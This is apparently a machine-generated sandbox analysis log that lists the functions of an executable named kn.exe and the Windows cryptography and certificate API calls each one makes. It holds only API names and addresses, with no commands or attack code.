      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08614F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF7E08614F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF7E07F3504
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08334F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF7E08334F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E083342C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E086141C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0795438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF7E0795438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF7E084B464
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF7E081F488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0839480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0839480
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07BD5C2
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF7E07F55F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08195FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF7E08195FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF7E07FB55C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F570 CryptHashCertificate,SetLastError,6_2_00007FF7E085F570
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E0833590
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0869580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF7E0869580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E07E76B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF7E084D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08336E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E08336E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF7E081F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF7E07BF630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F650 CryptHashCertificate2,SetLastError,6_2_00007FF7E085F650
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF7E0833654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E082F644
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF7E07BD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF7E07A5664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF7E080366C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF7E081B664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0859688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF7E0859688
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08337A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E08337A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF7E07D17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08497E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF7E08497E4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF7E081B808
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF7E085F7FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF7E07CF810
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF7E085D750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0835768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0835768
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF7E07FF774
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF7E084B794
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF7E080577C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF7E07CD790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF7E07AB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E08698B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B8D0 I_CryptGetLruEntryData,#357,6_2_00007FF7E081B8D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08018DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF7E08018DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF7E07A38FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF7E082184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF7E081D850
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E0833860
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF7E07C7884
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0809878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF7E0809878
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF7E081B9CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF7E07BF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF7E086BA14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07B3918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF7E085F918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF7E083391C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EF944 CryptDecodeObject,GetLastError,#357,6_2_00007FF7E07EF944
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B950 I_CryptGetLruEntryData,#357,6_2_00007FF7E081B950
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0859970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF7E0859970
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E088B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF7E088B980
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF7E081597C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF7E07C7988
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895AA8 CryptDecodeObjectEx,6_2_00007FF7E0895AA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF7E07F3B14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0829AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF7E0829AF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07C3A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084BA50 CryptSignCertificate,SetLastError,6_2_00007FF7E084BA50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0831A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0831A44
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0837A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0837A70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0849A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF7E0849A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF7E085FA84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0795BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E0795BA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF7E07B9BC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF7E083BBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0833BEB
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF7E083FB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07FBB38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF7E086BB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0865B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF7E0865B44
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF7E0867B60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895B90 CryptDecodeObjectEx,memmove,6_2_00007FF7E0895B90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF7E07BBB80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF7E085FB94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0825CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF7E0825CE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF7E07CFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07EFC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF7E0895C54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF7E07D1C50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E07E3C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0821C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF7E0821C84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF7E07C5DA1
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF7E07A1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF7E07C5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF7E085FD2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF7E084DD1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF7E0867D3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF7E086BD3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF7E0895D74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07F1D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0813D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF7E0813D60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07E9D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EDD80 CertFindExtension,CryptDecodeObject,6_2_00007FF7E07EDD80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0845D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF7E0845D80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EDEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF7E07EDEA4
